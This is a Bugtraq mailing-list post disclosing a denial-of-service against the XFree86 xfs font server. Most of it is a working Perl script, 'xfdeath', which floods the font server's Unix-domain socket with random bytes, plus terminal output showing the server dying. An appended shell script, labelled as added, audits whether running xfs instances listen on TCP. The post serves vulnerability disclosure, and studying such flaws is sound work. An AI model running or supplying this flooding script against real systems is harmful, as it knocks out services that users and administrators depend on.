Bugtraq mailing list archives

Re:XFree86-xfs-4.0.1-1 DoS


From: "Mathias Dybvik" <tmdybvik () hotmail com>
Date: Mon, 11 Jun 2001 00:53:16 -0400

I forgot to mention that the TCP attack against the font server is (obviously) only applicable to font-servers listening to TCP. (Which is probably only the case for systems serving x-terminals.) Thanks to people who pointed this out.

If we want to kill a font-server running on the Mandrake/Redhat/whatever *default* setup, we have to send the garbage to the Unix-Domain socket instead.

I've only tested this on Mandrake 8.0; on my system it takes about 5-10 seconds before xfs dies. I apologize if the script is ugly; I'm a PHB, not a developer, and the few lines below are more Perl than I've written all year.

Mathias

[user@userland ~]$ ps -ax|grep xfs
3690 ?        S      0:00 xfs -port -1 -daemon -user xfs
3723 pts/2    S      0:00 grep xfs

[user@userland ~]$ ./xfdeath

[user@userland ~]$ ps -ax|grep xfs
3780 pts/1    S      0:00 grep xfs

[user@userland ~]$ cat xfdeath
#!/usr/bin/perl -w
use Socket;
use strict;
my ($grab, $line, $garbagebyte, $i, $STOP);
sub darned {
    $STOP = 1;
}
open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
$SIG{'PIPE'} = 'darned';
for ($i = 0; $i < 1000; ++$i)
{
    $STOP = 0;
    $grab = shift || '/tmp/.font-unix/fs-1';
    socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0)  || die "socket: $!";
    connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
    while (!$STOP) {
        read(GARBAGE, $garbagebyte, 1);
        print ".";
        print A_SOCKET $garbagebyte;
    }
}
exit;

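Added example (not part of the original post, and not the author's code): an administrator's check of how each running xfs is exposed, read from ps lines in the layout shown above. It assumes that "-port -1" disables the TCP listener, as the ps output in the post suggests, and that xfs falls back to TCP port 7100 when no -port option is given; the function names and the third sample line are constructed.

```shell
#!/bin/sh
# Report whether each running xfs font server listens on TCP or only on
# its Unix-domain socket, based on the command line shown by ps.
# Assumptions: "-port -1" disables TCP; the default TCP port is 7100.

xfs_exposure() {
    # $1: the arguments of one xfs command line (everything after "xfs")
    set -f              # no globbing while the string is word-split
    set -- $1
    set +f
    port=7100           # assumed default when -port is absent
    while [ $# -gt 0 ]; do
        if [ "$1" = "-port" ] && [ $# -ge 2 ]; then
            port=$2
            shift
        fi
        shift
    done
    case $port in
        -1)          echo "unix-only" ;;
        ''|*[!0-9]*) echo "unknown" ;;
        *)           echo "tcp:$port" ;;
    esac
}

audit_xfs() {
    # stdin: lines in "ps -ax" layout: PID TTY STAT TIME COMMAND [ARGS...]
    while read -r pid tty stat cputime cmd args; do
        case ${cmd##*/} in
            xfs) echo "$pid $(xfs_exposure "$args")" ;;
        esac
    done
}

# Sample input: the first two lines are from the post, the third is constructed.
audit_xfs <<'EOF'
3690 ?        S      0:00 xfs -port -1 -daemon -user xfs
3723 pts/2    S      0:00 grep xfs
4001 ?        S      0:00 /usr/X11R6/bin/xfs -daemon -port 7100
EOF
```

A "unix-only" result still leaves the socket under /tmp/.font-unix reachable by local users, which is the case this post covers; a "tcp:" result means the server is also reachable over the network unless filtered.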

